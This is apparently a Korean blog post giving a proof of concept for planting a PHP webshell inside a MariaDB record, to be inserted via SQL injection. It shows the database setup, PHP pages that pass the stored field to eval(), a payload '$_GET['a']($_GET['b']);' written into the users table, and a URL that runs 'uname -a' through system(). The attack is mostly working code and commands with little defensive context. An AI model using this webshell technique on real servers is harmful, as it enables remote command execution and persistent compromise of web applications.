DB에 웹쉘코드 삽입 POC

php가변함수 참고 : https://demonteam.org/2018/07/18/php/

db에 웹쉘코드를 박고 실행이 될까 하는 의문점에서 시작한 POC

sql인젝션으로  DB에 웹쉘코드를 박고 활용하는 방안이다.

 

 

root@tkpark-VirtualBox:/var/www/html# mysql -u root -p Enter password: Welcome to the MariaDB monitor.  Commands end with ; or \g. Your MariaDB connection id is 43 Server version: 10.1.34-MariaDB-0ubuntu0.18.04.1 Ubuntu 18.04 Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others. Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. MariaDB [(none)]> create user 'iesay'@'%' identified by '1234'; Query OK, 0 rows affected (0.00 sec) MariaDB [(none)]> grant all on iesay.* to 'iesay'@'%'; Query OK, 0 rows affected (0.00 sec) MariaDB [(none)]> flush privileges; Query OK, 0 rows affected (0.00 sec)

 

 

MariaDB [(none)]> use iesay Database changed MariaDB [iesay]> create table users (     ->     idx int not null auto_increment primary key,     ->     id char(20),     ->     name varchar(100),     ->     pw char(20)     ->     ); Query OK, 0 rows affected (0.02 sec) MariaDB [iesay]> show tables; +-----------------+ | Tables_in_iesay | +-----------------+ | users           | +-----------------+

 

MariaDB [iesay]> desc users; +-------+----------+------+-----+---------+----------------+ | Field | Type     | Null | Key | Default | Extra          | +-------+----------+------+-----+---------+----------------+ | idx   | int(11)  | NO   | PRI | NULL    | auto_increment | | id    | char(20) | YES  |     | NULL    |                | | name  | char(20) | YES  |     | NULL    |                | | pw    | char(20) | YES  |     | NULL    |                | +-------+----------+------+-----+---------+----------------+ 4 rows in set (0.00 sec) MariaDB [iesay]> insert into users(id, name, pw) values('admin', '관리자', 'toor'); Query OK, 1 row affected (0.00 sec)

 

 

MariaDB [iesay]> select * from users; +-----+---------+-----------+------+ | idx | id      | name      | pw   | +-----+---------+-----------+------+ |   1 | admin   | 관리자    | toor | |   +-----+---------+-----------+------+ 1 rows in set (0.00 sec)

 

apt-get install php7.0-mysql

설치 후

phpinfo에서 PDO확인

 

 

MariaDB [iesay]> update users set name = "system(ls);" where id="admin"; Query OK, 1 row affected (0.00 sec) Rows matched: 1  Changed: 1  Warnings: 0 MariaDB [iesay]> select * from users; +-----+---------+-------------+------+ | idx | id      | name        | pw   | +-----+---------+-------------+------+ |   1 | admin   | system(ls); | toor | |   +-----+---------+-------------+------+ 1 rows in set (0.00 sec)

 

 

 

1.php

session_start(); // 세션 include ("connect.php"); // DB접속 $query = "select * from users where id='admin' and pw='toor'"; $result = mysqli_query($con, $query); $row = mysqli_fetch_array($result); $a= $row['name']; ?>

 

 

2.php

<html> <body> <h1>Welcome to my home page!</h1> <p>Some text.</p> <p>Some more text.</p> <?php include '1.php'; eval($a); ?> </body> </html>

 

 

eval함수를 이용한 웹쉘,,,

 

MariaDB [iesay]> update users set name = "$_GET['a']($_GET['b']);" where id="admin"; Query OK, 1 row affected (0.01 sec) Rows matched: 1  Changed: 1  Warnings: 0 MariaDB [iesay]> select * from users; +-----+---------+-------------------------+------+ | idx | id      | name                    | pw   | +-----+---------+-------------------------+------+ |   1 | admin   | $_GET['a']($_GET['b']); | toor | |   +-----+---------+-------------------------+------+ 1 rows in set (0.00 sec)

 

 

 

http://192.168.0.118/2.php?a=system&b=uname%20-a

가변함수로도 사용 가능